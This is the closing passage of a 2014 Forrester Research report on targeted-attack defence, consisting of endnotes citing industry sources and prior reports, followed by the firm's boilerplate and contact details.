    11 Source: Sai Omkar Vashisht and Abhishek Singh, Turing Test In Reverse: New Sandbox-Evasion Techniques Seek Human Interaction, FireEye Blog, June 24, 2014 (http://www.fireeye.com/blog/technical/malware-research/2014/06/turing-test-in-reverse-new-sandbox-evasion-techniques-seek-human-interaction.html).

    12 We have covered the key components of a Zero Trust network in-depth in a previous report. See the November 15, 2012, Build Security Into Your Networks DNA: The Zero Trust Network Architecture report.

    13 We have covered NAV tools in-depth in a previous report. See the January 24, 2011, Pull Your Head Out Of The Sand And Put It On A Swivel: Introducing Network Analysis And Visibility report.

    14 We have covered the convergence of some NAV and SIM/SIEM in a previous report. See the August 9, 2012, Dissect Data To Gain Actionable INTEL report.

    15 We have covered the characteristics of several EVC solutions in-depth in a previous report. See the June 9, 2014, Prepare For The Post-AV Era Part 1: Five Alternatives To Endpoint Antivirus report.

    16 Source: Brian Krebs, Security Firm Bit9 Hacked, Used To Spread Malware, Krebs on Security, February 8, 2013 (http://krebsonsecurity.com/2013/02/security-firm-bit9-hacked-used-to-spread-malware/).

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 18

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    17 Dissect Data To Gain Actionable INTEL: The real value of SIM, and its survival, depends on big data analytics for situational awareness. Known as security analytics (SA), it involves looking beyond network security data to include the collection and analysis of new types of IT data that will transform SIM into an SA tool that provides both security and IT analytics. For S&R professionals, context is key to security analytics. This will help identify events that are happening now but also assess the state of security within the enterprise in order to predict what may occur in the future and make proactive security decisions. See the August 9, 2012, Dissect Data To Gain Actionable INTEL report.

    18 Source: CrowdStrike Releases Endpoint Activity Monitoring Application, CrowdStrike press release, February 20, 2014 (http://www.crowdstrike.com/news/crowdstrike-releases-endpoint-activity-monitoring-application/index.html).

    19 We have covered the acquisition of NetCitadel in-depth in a previous report. See the June 19, 2014, Brief: Proofpoint Strengthens Its Targeted Attack Defense With NetCitadel Acquisition report.

    20 We have covered the merge of Bit9 and Carbon Black in-depth in a previous report. See the February 14, 2014, Quick Take: Bit9 And Carbon Black Merge report.

    21 The fourth tier in the targeted-attack hierarchy of needs: An integrated portfolio that enables orchestration.

  • Forrester Research (Nasdaq: FORR) is a global research and advisory firm serving professionals in 13 key roles across three distinct client segments. Our clients face progressively complex business and technology decisions every day. To help them understand, strategize, and act upon opportunities brought by change, Forrester provides proprietary research, consumer and business data, custom consulting, events and online communities, and peer-to-peer executive programs. We guide leaders in business technology, marketing and strategy, and the technology industry through independent fact-based insight, ensuring their business success today and tomorrow. 116182

    Forrester Focuses On Security & Risk Professionals to help your firm capitalize on new business opportunities safely,

    you must ensure proper governance oversight to manage risk while

    optimizing security processes and technologies for future flexibility.

    Forresters subject-matter expertise and deep understanding of your

    role will help you create forward-thinking strategies; weigh opportunity

    against risk; justify decisions; and optimize your individual, team, and

    corporate performance.

    sean Rhodes, client persona representing Security & Risk Professionals

    About Forrestera global research and advisory firm, Forrester inspires leaders,

    informs better decisions, and helps the worlds top companies turn

    the complexity of change into business advantage. our research-

    based insight and objective advice enable it professionals to

    lead more successfully within it and extend their impact beyond

    the traditional it organization. tailored to your individual role, our

    resources allow you to focus on important business issues

    margin, speed, growth first, technology second.

    foR moRe infoRmation

    To find out how Forrester Research can help you be successful every day, please contact the office nearest you, or visit us at www.forrester.com. For a complete list of worldwide locations, visit www.forrester.com/about.

    Client suppoRt

    For information on hard-copy or electronic reprints, please contact Client Support at +1 866.367.7378, +1 617.613.5730, or [email protected]. We offer quantity discounts and special pricing for academic and nonprofit institutions.

    Forresters Targeted-Attack Hierarchy Of Needs ContinuesYou Must Build Each Tech Pillar Of The Breach Detection StackBalance The Pillars Based On Your NeedsDetection And Response Require An Integrated Technology StackSupplemental MaterialEndnotes